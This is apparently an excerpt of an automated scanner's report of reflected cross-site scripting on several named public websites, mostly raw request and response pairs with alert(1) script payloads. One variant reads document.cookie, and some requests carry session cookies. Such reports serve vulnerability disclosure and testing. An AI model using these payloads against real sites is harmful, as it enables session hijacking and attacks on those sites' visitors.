This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?&intl=1&dist=9&zoom=12&zip=&client=navy&city=9a923</script><script>alert(1)</script>09ca345e6cd HTTP/1.1 Host: www.branchmap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:06:16 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 11476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script type="text/javascript">
var mydist='9'; var myaddress=''; var mystate=''; var mycity='9a923</script><script>alert(1)</script>09ca345e6cd'; var myzip=''; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt(5); var sortstrict= '0'; var myzoom = parseInt(12 ...[SNIP]...
The value of the dist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a6fe</script><script>alert(1)</script>c091167078b was submitted in the dist parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?&intl=1&dist=96a6fe</script><script>alert(1)</script>c091167078b&zoom=12&zip=&client=navy&city= HTTP/1.1 Host: www.branchmap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:05:57 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 11476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script type="text/javascript">
var mydist='96a6fe</script><script>alert(1)</script>c091167078b'; var myaddress=''; var mystate=''; var mycity=''; var myzip=''; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt( ...[SNIP]...
The value of the zip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17a84</script><script>alert(1)</script>6bbb498c306 was submitted in the zip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?client=navy&zip=17a84</script><script>alert(1)</script>6bbb498c306 HTTP/1.1 Host: www.branchmap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:05:50 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 11469
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script type="text/javascript">
var mydist='3'; var myaddress=''; var mystate=''; var mycity=''; var myzip='17a84</script><script>alert(1)</script>6bbb498c306'; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt(5); var sortstrict= '0'; var myzoom = parseInt(8); var maptype ...[SNIP]...
The value of the zoom request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ceaa%3balert(1)//c7cc7a9b7c8 was submitted in the zoom parameter. This input was echoed as 2ceaa;alert(1)//c7cc7a9b7c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?&intl=1&dist=9&zoom=122ceaa%3balert(1)//c7cc7a9b7c8&zip=&client=navy&city= HTTP/1.1 Host: www.branchmap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:05:59 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 11453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script t ...[SNIP]... '; var myzip=''; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt(5); var sortstrict= '0'; var myzoom = parseInt(122ceaa;alert(1)//c7cc7a9b7c8); var maptype = ''; var mapwidth= '552'; var mapheight= '500'; var zoomfirst = ''; var myversion = 'v53'; var dedupeList = 'navy'; var drivingDir = ''; var noOriginPoint = ''; var disclaimer = ''; var ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c432</script><script>alert(1)</script>593046afd78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78 HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 01:07:40 GMT Server: Apache/2.2.8 Set-Cookie: c2_user_state=4a49c31771737435e71c497a27a4ef68%3A0; path=/; domain=.care2.com Set-Cookie: c2_user_state=580b27568625e1c9c22011d9bba42f4c%3A0; path=/; domain=.care2.com X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 01:07:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:07:41 GMT; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 76015
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName="Care2 : Green Living : Channel : Bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78" s.server="www.care2.com" s.channel="Greenliving" s.pageType="" s.prop3="Greenliving" s.prop16="Unregistered" s.prop22="GL Channel : bluefin-tuna-sells-for-396000.html4c432</script> ...[SNIP]...
3.91. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.care2.com
Path:
/greenliving/bluefin-tuna-sells-for-396000.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2fbf</script><script>alert(1)</script>5ef21547687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1 HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... -1555312', 'mouseover', function(){memberRollover.mem(this);;}); new CARE2.prime.PillManager('d9a3e6ff-1'); function onFacebookConnect() { var pg = "/greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1" + "#comment_form"; C2FBConnect.onConnect(pg); } FB.init("dfc27a7e48d90111634fd0bbe8eb73d7", "/fb/xd_receiver.htm"); if($('newCommentForm')) {
var theForm = $('newCommentForm').getElementsB ...[SNIP]...
3.92. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.care2.com
Path:
/greenliving/bluefin-tuna-sells-for-396000.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3605</script><script>alert(1)</script>a13efd1020b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1 HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <script type="text/javascript">
function loadCommentPage(page, numPerPage, itemID) { var sPath = '/greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1'; var charForQueryString = (sPath.indexOf("?") != -1) ? "&" : "?"; var servlet = charForQueryString + 'Care2CommentPageAJAX=1&page='+page+'&commentsPerPage='+numPerPage+'&itemID='+itemID;
...[SNIP]...
3.93. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.care2.com
Path:
/greenliving/bluefin-tuna-sells-for-396000.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9beb"><script>alert(1)</script>7188eebfdad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9beb\"><script>alert(1)</script>7188eebfdad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html?f9beb"><script>alert(1)</script>7188eebfdad=1 HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <input type="hidden" name="pg" value="/greenliving/bluefin-tuna-sells-for-396000.html?f9beb\"><script>alert(1)</script>7188eebfdad=1#comment_form" /> ...[SNIP]...
3.94. http://www.chasemilitary.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.chasemilitary.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8517f"%3balert(1)//55b2694a95c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8517f";alert(1)//55b2694a95c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?8517f"%3balert(1)//55b2694a95c=1 HTTP/1.1 Host: www.chasemilitary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=OVMPLYS727Bec7OCKKLW; path=/ Cache-Control: private Content-Length: 68609 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=rehnjh55ru5bdbjfzqdu5vzl; path=/; HttpOnly Date: Wed, 02 Feb 2011 22:16:44 GMT Connection: close
The value of the ada request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab183"%3balert(1)//884aa7f60f1 was submitted in the ada parameter. This input was echoed as ab183";alert(1)//884aa7f60f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Default.aspx?ada=trueab183"%3balert(1)//884aa7f60f1 HTTP/1.1 Host: www.chasemilitary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ARPT=OVMPLYSilkbyCKKWU; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.2.10.1296685136; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68621 Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 01:06:45 GMT Connection: close
3.96. http://www.chasemilitary.com/Default.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.chasemilitary.com
Path:
/Default.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8d08"%3balert(1)//c9371ab82a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8d08";alert(1)//c9371ab82a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Default.aspx?e8d08"%3balert(1)//c9371ab82a8=1 HTTP/1.1 Host: www.chasemilitary.com Proxy-Connection: keep-alive Referer: http://www.chasemilitary.com/?8517f%22%3balert(document.cookie)//55b2694a95c=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=OVMPLYSilkbyCKKWU; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45; __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.1.10.1296685136
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68609 Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 00:07:27 GMT
The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bdade(a)d80aea01345 was submitted in the hl parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=ipboard+software&hl=enbdade(a)d80aea01345&prmd=ivns HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:09:09 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
3.98. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.google.com
Path:
/advanced_search
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f394a(a)d2919261fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?f394a(a)d2919261fa0=1 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:08:40 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the prmd request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a960d(a)ecab87e67a8 was submitted in the prmd parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=ipboard+software&hl=en&prmd=ivnsa960d(a)ecab87e67a8 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:09:14 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4db85(a)700ed73b9bc was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=ipboard+software4db85(a)700ed73b9bc&hl=en&prmd=ivns HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:09:05 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6e290(a)d4e0b417516 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images?q=ipboard+software6e290(a)d4e0b417516&um=1&ie=UTF-8&source=og&sa=N&hl=en&tab=wi HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:11:25 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
3.102. http://www.invisionpower.com/products/board/features/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.invisionpower.com
Path:
/products/board/features/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 95e51--><a>1fddadebe75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /products/board/features/?95e51--><a>1fddadebe75=1 HTTP/1.1 Host: www.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <!-- ?95e51--><a>1fddadebe75=1 --> ...[SNIP]...
3.103. http://www.invisionpower.com/products/nexus/features/store.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.invisionpower.com
Path:
/products/nexus/features/store.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e722--><a>6ccf7c9b600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /products/nexus/features/store.php?5e722--><a>6ccf7c9b600=1 HTTP/1.1 Host: www.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <!-- store?5e722--><a>6ccf7c9b600=1 --> ...[SNIP]...
3.104. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.jpost.com
Path:
/ArtsAndCulture/FoodAndWine/Article.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 41326><script>alert(1)</script>d2be1bfeaa9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1 HTTP/1.1 Host: www.jpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:17:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=sgl5a4ygdcxxmom2wnek3a45; path=/; HttpOnly Content-Type: text/html; charset=utf-8 Content-Length: 117507 Accept-Ranges: bytes Cache-Control: private, max-age=420 Age: 0 Expires: Thu, 03 Feb 2011 01:24:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head id="ctl00_He ...[SNIP]... <iframe src=http://www.facebook.com/plugins/like.php?href=http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1&layout=button_count&show_faces=true&width=150&action=recommend&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; h ...[SNIP]...
